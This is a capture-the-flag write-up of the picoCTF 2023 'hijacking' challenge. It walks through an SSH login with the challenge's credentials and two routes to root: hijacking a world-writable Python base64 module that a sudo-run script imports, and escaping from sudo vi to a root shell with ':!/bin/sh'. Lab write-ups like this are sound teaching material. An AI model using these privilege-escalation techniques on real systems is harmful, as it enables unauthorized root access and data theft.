Level: Medium
Tags: picoCTF 2023, Binary Exploitation, privilege_escalation
Author: THEONESTE BYAGUTANGAZA
Description:
Getting root access can allow you to read the flag.
Luckily there is a python file that you might like to play with.
Through Social engineering, we've got the credentials to use on the server.
SSH is running on the server.
saturn.picoctf.net 52735
Username: picoctf
Password: urTi-qvQtA
Hints:
1. Check for Hidden files
2. No place like Home:)
Challenge link: https://play.picoctf.org/practice/challenge/352
We start by connecting to the server
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2023/Binary_Exploitation/hijacking]
└─$ ssh -p 52735 picoctf@saturn.picoctf.net
The authenticity of host '[saturn.picoctf.net]:52735 ([13.59.203.175]:52735)' can't be established.
ED25519 key fingerprint is SHA256:lAxuAwDPxkngr5Aw0vqCbwmNz/+0ii8HjltkWeRcMjw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[saturn.picoctf.net]:52735' (ED25519) to the list of known hosts.
picoctf@saturn.picoctf.net's password:
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.19.0-1024-aws x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
picoctf@challenge:~$ And then we look for the python file mentioned in the challenge description
picoctf@challenge:~$ ls -la
total 16
drwxr-xr-x 1 picoctf picoctf 20 Nov 4 15:38 .
drwxr-xr-x 1 root root 21 Aug 4 21:10 ..
-rw-r--r-- 1 picoctf picoctf 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 picoctf picoctf 3771 Feb 25 2020 .bashrc
drwx------ 2 picoctf picoctf 34 Nov 4 15:38 .cache
-rw-r--r-- 1 picoctf picoctf 807 Feb 25 2020 .profile
-rw-r--r-- 1 root root 375 Mar 16 2023 .server.pyThe python script is owned by root and we are not allowed to modify it.
Let's check what it contains
picoctf@challenge:~$ cat .server.py
import base64
import os
import socket
ip = 'picoctf.org'
response = os.system("ping -c 1 " + ip)
#saving ping details to a variable
host_info = socket.gethostbyaddr(ip)
#getting IP from a domaine
host_info_to_str = str(host_info[2])
host_info = base64.b64encode(host_info_to_str.encode('ascii'))
print("Hello, this is a part of information gathering",'Host: ', host_info) Next, let's check what we can run with sudo
picoctf@challenge:~$ sudo -l
Matching Defaults entries for picoctf on challenge:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User picoctf may run the following commands on challenge:
(ALL) /usr/bin/vi
(root) NOPASSWD: /usr/bin/python3 /home/picoctf/.server.pyAs expected we can run the server file with python but we can also run vi.
We will try to hijack one of the python modules used in the server file, that is base64, os or socket.
First we find the path that python uses
picoctf@challenge:~$ python3
Python 3.8.10 (default, May 26 2023, 14:05:08)
[GCC 9.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import sys
>>> print(sys.path)
['', '/usr/lib/python38.zip', '/usr/lib/python3.8', '/usr/lib/python3.8/lib-dynload', '/usr/local/lib/python3.8/dist-packages', '/usr/lib/python3/dist-packages']
>>> exit()Next, we check the file permissions for the module files in the /usr/lib/python3.8 directory
picoctf@challenge:/usr/lib/python3.8$ ls -la base64.py os.py socket.py
-rwxrwxrwx 1 root root 20382 May 26 14:05 base64.py
-rw-r--r-- 1 root root 38995 May 26 14:05 os.py
-rw-r--r-- 1 root root 35243 May 26 14:05 socket.pyAh perfect, we can modify the base64.py file.
But we still don't know the name of the flag file.
We can use vi to read the /root directory just like any file
picoctf@challenge:/usr/lib/python3.8$ sudo vi /root/
[sudo] password for picoctf: The result is
" ============================================================================
" Netrw Directory Listing (netrw v165)
" /root
" Sorted by name
" Sort sequence: [\/]$,\<core\%(\.\d\+\)\=\>,\.h$,\.c$,\.cpp$,\~\=\*$,*,\.o$,\.obj$,\.info$,\.swp$,\.bak$,\~$
" Quick Help: <F1>:help -:go up dir D:delete R:rename s:sort-by x:special
" ==============================================================================
../
./
.vim/
.bashrc
.flag.txt
.profile
So now we know that the flag file is /root/.flag.txt.
We add the following line to the base64.py file after the shebang
print(open('/root/.flag.txt', 'r').read())And finally we run the server with sudo to get the flag
picoctf@challenge:/usr/lib/python3.8$ sudo python3 ~/.server.py
picoCTF{<REDACTED>}
sh: 1: ping: not found
Traceback (most recent call last):
File "/home/picoctf/.server.py", line 7, in <module>
host_info = socket.gethostbyaddr(ip)
socket.gaierror: [Errno -5] No address associated with hostnameA more direct approach would be to use vi to launch a shell directly
picoctf@challenge:~$ sudo vi -c ':!/bin/sh'
[sudo] password for picoctf:
# cd /root
# ls -la
total 12
drwx------ 1 root root 23 Aug 4 21:12 .
drwxr-xr-x 1 root root 51 Nov 4 16:06 ..
-rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc
-rw-r--r-- 1 root root 43 Aug 4 21:12 .flag.txt
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
# cat .flag.txt
picoCTF{<REDACTED>}For additional information, please see the references below.